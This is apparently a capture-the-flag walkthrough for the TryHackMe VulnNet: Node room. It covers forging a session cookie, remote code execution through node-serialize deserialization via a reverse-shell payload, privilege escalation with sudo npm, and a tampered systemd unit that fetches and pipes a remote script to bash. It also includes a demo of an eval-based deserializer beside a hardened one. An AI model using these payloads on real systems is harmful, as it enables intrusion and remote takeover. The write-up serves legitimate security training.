TryHackMe: VulnNet: Node

Today we will take a look at TryHackMe: VulnNet: Node. My goal in sharing this writeup is to show you the way if you get stuck. Please try to understand each step and take notes.

  • Network scan

Command: sudo nmap -p- -sCV --open 10.10.41.219

PORT     STATE SERVICE VERSION
8080/tcp open  http    Node.js Express framework
|_http-title: VulnNet – Your reliable news source – Try Now!
|_http-open-proxy: Proxy might be redirecting requests
  • Web

When we first open the site, it greets us as a guest.

Let’s refresh the page and intercept the request with Burp Suite.

Looking at the request, we see that the website sets a cookie. Let’s decode it and look at its contents.

URL decode → Base64 decode

We see that it marks us as a guest. Replace the username with admin, re-encode the cookie the same way (Base64, then URL encode), and send the request again.

The response is now “Welcome Admin”, so the server trusts whatever the cookie says. But when we try to log in, it still asks for a password.

When I tampered with the cookie further, I received an error message in the response.

I pasted that error message into Google and found an article about it: the cookie is deserialized with node-serialize, whose unserialize() passes any string value prefixed with _$$ND_FUNC$$_ to eval(). A self-invoking function placed in the cookie therefore runs on the server as soon as the cookie is parsed.

It’s time to get the reverse shell.

  • Reverse Shell
Start a listener on your own machine first:

Command: nc -nvlp 4444

Payload (replace $IP with your own address):

{"username":"_$$ND_FUNC$$_function(){ require('child_process').exec('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc $IP 4444 >/tmp/f', function(error, stdout, stderr) { console.log(stdout) }); }()","isAdmin":true,"encoding": "utf-8"}

Base64-encode the JSON, URL-encode the result, set it as the cookie value and send the request. The trailing () after the function body makes it execute during deserialization, so nothing else needs to be triggered.
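As an added example (not code from the original writeup or from the room’s application), the following Node.js script shows the cookie handling end to end: decoding and re-encoding the URL-encoded Base64 JSON, forging a cookie that carries a self-invoking function, a simplified re-implementation of node-serialize’s unserialize() that shows why the _$$ND_FUNC$$_ marker executes code, and a hardened parser that rejects it. The field names (username, isAdmin, encoding) are taken from the payload above; the guest cookie contents are constructed for the demo, and the forged function only returns a string instead of spawning a shell.

```javascript
// Added example, not code from the original writeup or from the room's own app.
// It shows (1) how the session cookie is decoded and re-encoded (URL-encoding
// around base64 around JSON) and (2) why the "_$$ND_FUNC$$_" marker in the
// payload gives code execution: node-serialize's unserialize() eval()s any
// string value that starts with that marker. vulnerableUnserialize() below is a
// deliberately simplified re-implementation of that behaviour written for this
// example; it is not the library's source. The cookie contents are constructed
// here from the field names that appear in the writeup's payload.

const FUNCFLAG = '_$$ND_FUNC$$_';

// Decode a cookie value exactly as the writeup does: URL decode, then base64.
// Returns the raw JSON text so it can be fed to either parser below.
function decodeCookie(cookieValue) {
  return Buffer.from(decodeURIComponent(cookieValue), 'base64').toString('utf8');
}

// Reverse the process: the server expects base64(JSON), URL-encoded.
function encodeCookie(sessionObject) {
  const b64 = Buffer.from(JSON.stringify(sessionObject), 'utf8').toString('base64');
  return encodeURIComponent(b64);
}

// Build a forged cookie whose username is a self-invoking function (IIFE).
// jsBody is the JavaScript that will run on the server when the cookie is parsed.
function forgeIifeCookie(jsBody) {
  return encodeCookie({
    username: FUNCFLAG + 'function(){ ' + jsBody + ' }()',
    isAdmin: true,
    encoding: 'utf-8',
  });
}

// VULNERABLE (mirrors node-serialize): every string value carrying the marker is
// stripped of the marker and passed to eval() wrapped in parentheses. The trailing
// "()" added by forgeIifeCookie makes the function run immediately, during
// deserialization, before the application has looked at the session at all.
function vulnerableUnserialize(jsonText) {
  const obj = JSON.parse(jsonText);
  for (const key of Object.keys(obj)) {
    const value = obj[key];
    if (typeof value === 'string' && value.startsWith(FUNCFLAG)) {
      obj[key] = eval('(' + value.slice(FUNCFLAG.length) + ')'); // RCE sink
    }
  }
  return obj;
}

// HARDENED: JSON.parse never evaluates code. Also whitelist the fields and types
// the application needs, and refuse the marker outright so a tampered cookie
// fails closed instead of being half-trusted.
function safeParseSession(jsonText) {
  const obj = JSON.parse(jsonText);
  if (typeof obj.username !== 'string' || obj.username.includes(FUNCFLAG)) {
    throw new Error('rejected session cookie');
  }
  return { username: obj.username, isAdmin: obj.isAdmin === true };
}

// Demo on a constructed guest cookie and a forged one. The forged IIFE is benign
// here (it only returns a string); the writeup's version spawns a reverse shell.
const guestCookie = encodeCookie({ username: 'Guest', isAdmin: false, encoding: 'utf-8' });
console.log('guest cookie  :', guestCookie);
console.log('decoded       :', decodeCookie(guestCookie));

const forgedCookie = forgeIifeCookie("return 'ran on ' + process.platform");
console.log('vulnerable    :', vulnerableUnserialize(decodeCookie(forgedCookie)).username);
try {
  safeParseSession(decodeCookie(forgedCookie));
} catch (e) {
  console.log('hardened      :', e.message);
}
```

Run it with node; the vulnerable path prints a value computed on the “server” side from a string that arrived in the cookie, which is exactly the primitive the reverse-shell payload abuses. The fix is not to sanitize the marker but to stop using a deserializer that can evaluate code at all: JSON.parse plus a field whitelist is enough for a session cookie, and a signed cookie would additionally stop the guest-to-admin edit.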

  • serv-manage

After getting the shell, upgrade it to a fully interactive TTY:

Command: script /dev/null -c bash
Command: export TERM=xterm
Ctrl + z
Command: stty raw -echo ; fg
Command: reset

www@vulnnet-node:~/VulnNet-Node$ sudo -l
Matching Defaults entries for www on vulnnet-node:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www may run the following commands on vulnnet-node:
(serv-manage) NOPASSWD: /usr/bin/npm
npm runs the lifecycle scripts defined in package.json with the privileges of the user invoking it, so a preinstall script of /bin/bash gives us a shell as serv-manage. -C points npm at the directory holding our package.json, and --unsafe-perm keeps npm from switching user before running the script.

www@vulnnet-node:~/VulnNet-Node$ mkdir exploit
www@vulnnet-node:~/VulnNet-Node$ echo '{"scripts": {"preinstall": "/bin/bash"}}' > exploit/package.json
www@vulnnet-node:~/VulnNet-Node$ sudo -u serv-manage npm -C exploit --unsafe-perm i
  • Root
serv-manage@vulnnet-node:/home/www/VulnNet-Node/exploit$ sudo -l
Matching Defaults entries for serv-manage on vulnnet-node:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User serv-manage may run the following commands on vulnnet-node:
(root) NOPASSWD: /bin/systemctl start vulnnet-auto.timer
(root) NOPASSWD: /bin/systemctl stop vulnnet-auto.timer
(root) NOPASSWD: /bin/systemctl daemon-reload
serv-manage@vulnnet-node: locate vulnnet-auto.timer
serv-manage@vulnnet-node: cat /etc/systemd/system/vulnnet-auto.timer
--------------------------------
[Unit]
Description=Run VulnNet utilities every 30 min

[Timer]
OnBootSec=0min
# 30 min job
OnCalendar=*:0/30
Unit=vulnnet-job.service

[Install]
WantedBy=basic.target
--------------------------------
serv-manage@vulnnet-node: locate vulnnet-job.service
serv-manage@vulnnet-node: cat /etc/systemd/system/vulnnet-job.service
---------------------------------
[Unit]
Description=Logs system statistics to the systemd journal
Wants=vulnnet-auto.timer

[Service]
# Gather system statistics
Type=forking
ExecStart=/bin/df

[Install]
WantedBy=multi-user.target
---------------------------------

The service simply runs “ExecStart=/bin/df”. If the unit file is writable by serv-manage (check with ls -l /etc/systemd/system/vulnnet-job.service), we can replace that command with one that gives us a reverse shell, and the sudo rules let us restart the timer that triggers it as root.

First, let’s prepare a payload on our own machine.

$ nano exploit.sh

#!/bin/bash
bash -i >& /dev/tcp/Your_IP/4242 0>&1

Serve it over HTTP:

Command: python3 -m http.server 80

On the target machine, edit /etc/systemd/system/vulnnet-job.service and replace the ExecStart line with:

ExecStart=/bin/bash -c "curl http://Your_IP/exploit.sh | bash"

Local machine:

Command: nc -nvlp 4242

On the target machine, reload systemd so it picks up the edited unit, then restart the timer (the sudo rules allow exactly these three commands):

serv-manage@vulnnet-node: sudo -u root /bin/systemctl daemon-reload
serv-manage@vulnnet-node: sudo -u root /bin/systemctl stop vulnnet-auto.timer
serv-manage@vulnnet-node: sudo -u root /bin/systemctl start vulnnet-auto.timer

And now we are root.

“If you have any questions or comments, please do not hesitate to write. Have a good day.”


Hello, my name is Elman. I am from Azerbaijan. I wish you a good day.
